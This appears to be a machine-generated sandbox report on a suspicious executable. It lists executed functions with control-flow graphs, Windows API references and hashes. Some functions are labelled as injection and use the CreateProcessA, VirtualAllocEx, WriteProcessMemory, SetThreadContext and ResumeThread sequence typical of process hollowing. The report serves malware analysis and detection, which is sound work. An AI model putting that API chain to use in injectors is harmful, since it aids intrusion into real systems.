18612 12225b3 18608->18612 18610 12223c5 18609->18610 18611 12223cc RtlDecodePointer 18609->18611 18610->18611 18618 122240a 18611->18618 18612->18591 18613 1222443 RtlEncodePointer 18613->18618 18614 122248f RtlDecodePointer 18615 12224c6 RtlEncodePointer 18614->18615 18614->18618 18615->18618 18616 1222511 RtlDecodePointer 18617 122254c RtlDecodePointer 18616->18617 18616->18618 18617->18618 18618->18612 18618->18613 18618->18614 18618->18615 18618->18616 18618->18617 18459 60675d0 18460 60675f5 18459->18460 18466 6067848 6 API calls 18460->18466 18467 6067838 18460->18467 18461 6067616 18462 6067735 18461->18462 18464 6067d08 6 API calls 18461->18464 18472 6067cf7 18461->18472 18464->18462 18466->18461 18468 606785a 18467->18468 18470 6067878 6 API calls 18468->18470 18471 6067888 6 API calls 18468->18471 18469 6067865 18469->18461 18470->18469 18471->18469 18474 6067d35 18472->18474 18473 6067d40 18473->18462 18474->18473 18475 60f1d3b 4 API calls 18474->18475 18476 60f1bd2 6 API calls 18474->18476 18477 60f1f02 2 API calls 18474->18477 18475->18473 18476->18473 18477->18473 18619 6065ab0 18620 6065ac3 18619->18620 18622 6065af6 6 API calls 18620->18622 18623 6065af8 6 API calls 18620->18623 18621 6065ae2 18622->18621 18623->18621 18478 611c508 18479 611c51c 18478->18479 18480 611c525 18479->18480 18482 611c75a 18479->18482 18486 611c840 18482->18486 18490 611c9b8 18482->18490 18487 611c884 18486->18487 18488 611c97b 18487->18488 18494 611cc38 18487->18494 18491 611c9be 18490->18491 18506 611cf00 18491->18506 18492 611c763 18492->18480 18495 611cc46 18494->18495 18497 611cca3 18494->18497 18500 611cc38 RtlEncodePointer 18495->18500 18502 611cc98 18495->18502 18496 611cc66 18496->18488 18498 611ccfc RtlEncodePointer 18497->18498 18499 611cd25 18497->18499 18498->18499 18499->18488 18500->18496 18503 611ccd2 18502->18503 18504 611ccfc RtlEncodePointer 18503->18504 18505 611cd25 18503->18505 18504->18505 18505->18496 18507 611cf0e 18506->18507 18510 611cf39 18507->18510 18508 611cf1e 18508->18492 18511 611cf81 18510->18511 18512 611cfa7 RtlEncodePointer 18511->18512 18513 611cfd0 18511->18513 18512->18513 18513->18508 18514 606b658 18515 606b66b 18514->18515 18518 6065af8 18515->18518 18519 6065b09 18518->18519 18520 6060040 6 API calls 18519->18520 18521 6065b19 18520->18521 18522 60647d0 6 API calls 18521->18522 18523 6065b29 18522->18523

                                                                                                                              Executed Functions

                                                                                                                              Function 01222348 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • RtlDecodePointer.NTDLL ref: 012223AF
                                                                                                                              • RtlDecodePointer.NTDLL ref: 012223F4
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0122245F
                                                                                                                              • RtlDecodePointer.NTDLL(-000000FC), ref: 012224A9
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 012224E9
                                                                                                                              • RtlDecodePointer.NTDLL ref: 0122252F
                                                                                                                              • RtlDecodePointer.NTDLL ref: 01222573
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$Decode$Encode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1638560559-0
                                                                                                                              • Opcode ID: acea95d31e316088cdeff56ae7f29c3980c28b47d4339b2f3de47aae7b500f0d
                                                                                                                              • Instruction ID: 47c80f15c523cf528077e4a6e348fbe9a1019b884bb75b01f57a1e9cc645477f
                                                                                                                              • Opcode Fuzzy Hash: acea95d31e316088cdeff56ae7f29c3980c28b47d4339b2f3de47aae7b500f0d
                                                                                                                              • Instruction Fuzzy Hash: 75810574C16268EFDB14DFA8E1987CCBFF1AB08318F24800AEA15B7291C7765984CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01222333 Relevance: 10.7, APIs: 7, Instructions: 167COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 40 1222333-1222338 41 1222357-122238b 40->41 42 122233a-1222356 40->42 44 1222391-12223c3 RtlDecodePointer 41->44 45 12225d9-12225f4 41->45 42->41 47 12223c5-12223cb 44->47 48 12223cc-1222408 RtlDecodePointer 44->48 47->48 49 1222411-122241e 48->49 50 122240a-1222410 48->50 52 12225b3-12225d6 49->52 53 1222424-1222428 49->53 50->49 52->45 53->52 56 122242e-1222430 53->56 56->52 57 1222436-1222439 56->57 58 122243c-1222441 57->58 60 1222443-1222473 RtlEncodePointer 58->60 61 1222487-1222489 58->61 63 1222475-122247b 60->63 64 122247c-1222485 60->64 61->52 65 122248f-12224bd RtlDecodePointer 61->65 63->64 64->58 64->61 66 12224c6-12224fd RtlEncodePointer 65->66 67 12224bf-12224c5 65->67 69 1222506-1222543 RtlDecodePointer 66->69 70 12224ff-1222505 66->70 67->66 74 1222545-122254b 69->74 75 122254c-1222587 RtlDecodePointer 69->75 70->69 74->75 76 1222590-1222599 75->76 77 1222589-122258f 75->77 79 12225a4-12225ae 76->79 80 122259b-122259e 76->80 77->76 79->58 80->58 80->79
                                                                                                                              APIs
                                                                                                                              • RtlDecodePointer.NTDLL ref: 012223AF
                                                                                                                              • RtlDecodePointer.NTDLL ref: 012223F4
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0122245F
                                                                                                                              • RtlDecodePointer.NTDLL(-000000FC), ref: 012224A9
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 012224E9
                                                                                                                              • RtlDecodePointer.NTDLL ref: 0122252F
                                                                                                                              • RtlDecodePointer.NTDLL ref: 01222573
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$Decode$Encode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1638560559-0
                                                                                                                              • Opcode ID: 40698a7306fbb9b67dbcc352f706e4cd7d3c591c98192833e8ce187f5941de58
                                                                                                                              • Instruction ID: 2e50e3cf3601e034a163ed1d1bdf5c9603648295f9478db9c60e3c5525607dbc
                                                                                                                              • Opcode Fuzzy Hash: 40698a7306fbb9b67dbcc352f706e4cd7d3c591c98192833e8ce187f5941de58
                                                                                                                              • Instruction Fuzzy Hash: 3B812974C16268EFDB14CFA8E19878CBFF1AB19318F28804AE945B7391C7765884CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01220E1D Relevance: 1.9, APIs: 1, Instructions: 421injectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 82 1220e1d-122112e 85 1221130-122113c 82->85 86 122113e-122117d WriteProcessMemory 82->86 85->86 88 1221186-12211b6 86->88 89 122117f-1221185 86->89 89->88
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01221170
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: fd36fe446ab5b827dee96b6d627a42ed85e5983a46c2789cb34dcfd995c6d416
                                                                                                                              • Instruction ID: 2eeadfbd5d95223995f5c6b9ac94b0b952faf9e3910268cd144a29bf1992f9fa
                                                                                                                              • Opcode Fuzzy Hash: fd36fe446ab5b827dee96b6d627a42ed85e5983a46c2789cb34dcfd995c6d416
                                                                                                                              • Instruction Fuzzy Hash: 8B31C9719043899FDB10CFA9C880BEEBFF0FF48314F14842AE948A7242C7789955CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0122127C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 210 122127c-122131d 212 1221356-1221376 210->212 213 122131f-1221329 210->213 220 1221378-1221382 212->220 221 12213af-12213de 212->221 213->212 214 122132b-122132d 213->214 215 1221350-1221353 214->215 216 122132f-1221339 214->216 215->212 218 122133b 216->218 219 122133d-122134c 216->219 218->219 219->219 222 122134e 219->222 220->221 223 1221384-1221386 220->223 227 12213e0-12213ea 221->227 228 1221417-12214d1 CreateProcessA 221->228 222->215 225 1221388-1221392 223->225 226 12213a9-12213ac 223->226 229 1221396-12213a5 225->229 230 1221394 225->230 226->221 227->228 232 12213ec-12213ee 227->232 241 12214d3-12214d9 228->241 242 12214da-1221560 228->242 229->229 231 12213a7 229->231 230->229 231->226 233 12213f0-12213fa 232->233 234 1221411-1221414 232->234 236 12213fe-122140d 233->236 237 12213fc 233->237 234->228 236->236 239 122140f 236->239 237->236 239->234 241->242 252 1221562-1221566 242->252 253 1221570-1221574 242->253 252->253 254 1221568 252->254 255 1221576-122157a 253->255 256 1221584-1221588 253->256 254->253 255->256 257 122157c 255->257 258 122158a-122158e 256->258 259 1221598-122159c 256->259 257->256 258->259 262 1221590 258->262 260 12215ae-12215b5 259->260 261 122159e-12215a4 259->261 263 12215b7-12215c6 260->263 264 12215cc 260->264 261->260 262->259 263->264 266 12215cd 264->266 266->266
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 012214BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: d4e7997da6f6110fcaf452cbe5917bef5a7324cbb39ca85c08d186da3450a646
                                                                                                                              • Instruction ID: 4bee3736eeda83294f5f320ee2eb4b5b0d479cf87030efc52a6b519609bc94f1
                                                                                                                              • Opcode Fuzzy Hash: d4e7997da6f6110fcaf452cbe5917bef5a7324cbb39ca85c08d186da3450a646
                                                                                                                              • Instruction Fuzzy Hash: CEA18C71D1022ADFEB10CFA8C841BEDBBB2FF48314F1485A9D909A7280DB749995CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01221288 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 267 1221288-122131d 269 1221356-1221376 267->269 270 122131f-1221329 267->270 277 1221378-1221382 269->277 278 12213af-12213de 269->278 270->269 271 122132b-122132d 270->271 272 1221350-1221353 271->272 273 122132f-1221339 271->273 272->269 275 122133b 273->275 276 122133d-122134c 273->276 275->276 276->276 279 122134e 276->279 277->278 280 1221384-1221386 277->280 284 12213e0-12213ea 278->284 285 1221417-12214d1 CreateProcessA 278->285 279->272 282 1221388-1221392 280->282 283 12213a9-12213ac 280->283 286 1221396-12213a5 282->286 287 1221394 282->287 283->278 284->285 289 12213ec-12213ee 284->289 298 12214d3-12214d9 285->298 299 12214da-1221560 285->299 286->286 288 12213a7 286->288 287->286 288->283 290 12213f0-12213fa 289->290 291 1221411-1221414 289->291 293 12213fe-122140d 290->293 294 12213fc 290->294 291->285 293->293 296 122140f 293->296 294->293 296->291 298->299 309 1221562-1221566 299->309 310 1221570-1221574 299->310 309->310 311 1221568 309->311 312 1221576-122157a 310->312 313 1221584-1221588 310->313 311->310 312->313 314 122157c 312->314 315 122158a-122158e 313->315 316 1221598-122159c 313->316 314->313 315->316 319 1221590 315->319 317 12215ae-12215b5 316->317 318 122159e-12215a4 316->318 320 12215b7-12215c6 317->320 321 12215cc 317->321 318->317 319->316 320->321 323 12215cd 321->323 323->323
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 012214BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: 6692a0a365769a9e578138f1e754eac088aac04c5cdde7347e43b0111fa72a78
                                                                                                                              • Instruction ID: 4ce0610786dceef0e0fde8decef2ab4adc53fef7275b1a7bb06cecc2c2aba702
                                                                                                                              • Opcode Fuzzy Hash: 6692a0a365769a9e578138f1e754eac088aac04c5cdde7347e43b0111fa72a78
                                                                                                                              • Instruction Fuzzy Hash: 01917B71D10229DFEB20CFA8C841BEDBBB2FF48314F1485A9D919A7280DB749995CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 012210E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 324 12210e0-122112e 326 1221130-122113c 324->326 327 122113e-122117d WriteProcessMemory 324->327 326->327 329 1221186-12211b6 327->329 330 122117f-1221185 327->330 330->329
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01221170
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: a3c110aba4b5a4f3450fd24f7a7b2f35a234712c8cb02566c3d38c65d5d498f3
                                                                                                                              • Instruction ID: af859397cd47f00d325d06ad0ed12499f2d24843cd4758a27043434726b4d6cb
                                                                                                                              • Opcode Fuzzy Hash: a3c110aba4b5a4f3450fd24f7a7b2f35a234712c8cb02566c3d38c65d5d498f3
                                                                                                                              • Instruction Fuzzy Hash: 382127719003599FDF10CFA9C884BEEBBF5FF48314F508429EA18A7240C7789955CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0611CC38 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 334 611cc38-611cc44 335 611cca3-611ccda 334->335 336 611cc46-611cc56 call 611c808 334->336 343 611cce0 335->343 344 611ccdc-611ccde 335->344 353 611cc60 call 611cc38 336->353 354 611cc60 call 611cc98 336->354 340 611cc66-611cc85 call 611ca58 346 611cce5-611ccf0 343->346 344->346 347 611cd51-611cd5e 346->347 348 611ccf2-611cd23 RtlEncodePointer 346->348 350 611cd25-611cd2b 348->350 351 611cd2c-611cd4c 348->351 350->351 351->347 353->340 354->340
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0611CD12
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425365364.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6110000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: c8faf370df25f85f2da8940690783e395a2ae9ef0d99c5f7df8761ebf0a79c24
                                                                                                                              • Instruction ID: dba22ca222244cdc478b18f0ade65b18bcbbc0baf56b6fe7b07327da4a7fc4ed
                                                                                                                              • Opcode Fuzzy Hash: c8faf370df25f85f2da8940690783e395a2ae9ef0d99c5f7df8761ebf0a79c24
                                                                                                                              • Instruction Fuzzy Hash: 592168708023858FDB50DF69D54839EBFF2FB4A304F14842AD008AB641D3799989CFE2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 012216C3 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 355 12216c3-1221755 ReadProcessMemory 359 1221757-122175d 355->359 360 122175e-122178e 355->360 359->360
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 01221748
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: 1ecb7073e025a32e4f9f1790127adf8b59e71d4fa6e7332b6060593f6421a5b2
                                                                                                                              • Instruction ID: c86e3069cc888464e89293ac87c8f81b1c406eea979bff5335d8e2e9a97250f6
                                                                                                                              • Opcode Fuzzy Hash: 1ecb7073e025a32e4f9f1790127adf8b59e71d4fa6e7332b6060593f6421a5b2
                                                                                                                              • Instruction Fuzzy Hash: 24213971D002199FDB10CFAAD881BEEBBB5FF88324F548429E518A7240C7799951DBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01220B40 Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 364 1220b40-1220b93 368 1220ba3-1220bd3 SetThreadContext 364->368 369 1220b95-1220ba1 364->369 371 1220bd5-1220bdb 368->371 372 1220bdc-1220c0c 368->372 369->368 371->372
                                                                                                                              APIs
                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 01220BC6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1591575202-0
                                                                                                                              • Opcode ID: 171a8d4ee5bd45e79ceecc77a8a1e45cf759f3c840509244ec10745e6fe8f49b
                                                                                                                              • Instruction ID: ae08a1ab9ad97ad187a845ce08f4d3810d181c7c50dcc5d6aac3975a5673cd5f
                                                                                                                              • Opcode Fuzzy Hash: 171a8d4ee5bd45e79ceecc77a8a1e45cf759f3c840509244ec10745e6fe8f49b
                                                                                                                              • Instruction Fuzzy Hash: F9215771D003099FDB10DFAAC4847EEFBF4EF48324F548529E519A7280DB78A985CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 012216C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 386 12216c8-1221755 ReadProcessMemory 389 1221757-122175d 386->389 390 122175e-122178e 386->390 389->390
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 01221748
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: e1739d4a4e0e47c2289809d38cfc1a1cd2f749c66fbb280a6e0cc64426f788f3
                                                                                                                              • Instruction ID: e9f3ae569bac2cbb4d6744cb3a56692557cda3ebcbb0dbdceaa621658026c97c
                                                                                                                              • Opcode Fuzzy Hash: e1739d4a4e0e47c2289809d38cfc1a1cd2f749c66fbb280a6e0cc64426f788f3
                                                                                                                              • Instruction Fuzzy Hash: 232128B1D003599FDB10DFAAC880BEEBBF5FF48324F508429E919A7240C7799955CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01220B48 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 376 1220b48-1220b93 378 1220ba3-1220bd3 SetThreadContext 376->378 379 1220b95-1220ba1 376->379 381 1220bd5-1220bdb 378->381 382 1220bdc-1220c0c 378->382 379->378 381->382
                                                                                                                              APIs
                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 01220BC6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1591575202-0
                                                                                                                              • Opcode ID: dde286ff3952e905efa6774a335121b0155602857870099c00934631a05625d3
                                                                                                                              • Instruction ID: 175a8141434ac249ef04b729a5e9d6d06bc97698ae3402a9c3c54a398efaec01
                                                                                                                              • Opcode Fuzzy Hash: dde286ff3952e905efa6774a335121b0155602857870099c00934631a05625d3
                                                                                                                              • Instruction Fuzzy Hash: F3214971D003199FDB10DFAAC4847EEBBF4EF48324F548429E559A7240DB78A945CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0611CF39 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 394 611cf39-611cf88 call 611cd70 call 611cdc8 399 611cf8a-611cf8c 394->399 400 611cf8e 394->400 401 611cf93-611cf9b 399->401 400->401 402 611cff7-611d009 401->402 403 611cf9d-611cfce RtlEncodePointer 401->403 405 611cfd0-611cfd6 403->405 406 611cfd7-611cfed 403->406 405->406 406->402
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0611CFBD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425365364.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6110000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: ac712615bd967d5c3f6b3bd7ebd7e2e230102aff5f789098eec8863a88b75a90
                                                                                                                              • Instruction ID: 5f3bd9dc8f94553cc6788e9ea8e032427da304714f98ce3d563f8c6db8d65c8d
                                                                                                                              • Opcode Fuzzy Hash: ac712615bd967d5c3f6b3bd7ebd7e2e230102aff5f789098eec8863a88b75a90
                                                                                                                              • Instruction Fuzzy Hash: B62158718463868FDB60DFA9D904BDEBFF4EB09318F14486AE455EB241C3786548CBE2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01220C18 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 408 1220c18-1220c63 411 1220c6a-1220c9b VirtualAllocEx 408->411 412 1220ca4-1220cc9 411->412 413 1220c9d-1220ca3 411->413 413->412
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01220C8E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 716de51f4005303ad88bfdf18946a5ee0d44c7e7e23c222220b23d1c82610593
                                                                                                                              • Instruction ID: 2e1094a7eb146a97ad38c9aa0f903985a2e6876f8a4820e00c1037b67b8c308a
                                                                                                                              • Opcode Fuzzy Hash: 716de51f4005303ad88bfdf18946a5ee0d44c7e7e23c222220b23d1c82610593
                                                                                                                              • Instruction Fuzzy Hash: 361159719003099FDB10DFAAD844BEFBFF5EF88324F148819E515A7250C7799950CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01220A20 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 417 1220a20-1220a97 ResumeThread 421 1220aa0-1220ac5 417->421 422 1220a99-1220a9f 417->422 422->421
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: 76db25a6cc1c33bc971ddde4b68ac6ca218961684df3045b58bc23d515cfd949
                                                                                                                              • Instruction ID: e4d5e93b2db6354ac06f339a4454ec37e948d5a56cfcf13463d9c1c4c64154ab
                                                                                                                              • Opcode Fuzzy Hash: 76db25a6cc1c33bc971ddde4b68ac6ca218961684df3045b58bc23d515cfd949
                                                                                                                              • Instruction Fuzzy Hash: 5D115BB1D003098FDB10DFAAD4457EEFBF4EB88324F548429D515A7240CB79A945CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0611CC98 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0611CD12
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425365364.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6110000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EncodePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2118026453-0
                                                                                                                              • Opcode ID: 483d7d46ef363ad3ab1e4020e625fca6b016414c7e89d65970a02fc1e5374695
                                                                                                                              • Instruction ID: 93e2b668f71423e123cd268089774dfe464fea1facf461bacf49d92a986f888a
                                                                                                                              • Opcode Fuzzy Hash: 483d7d46ef363ad3ab1e4020e625fca6b016414c7e89d65970a02fc1e5374695
                                                                                                                              • Instruction Fuzzy Hash: 481176B09013898FDFA0DFAAC90879EBFF5FB49354F108429D409A7640D779A944CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

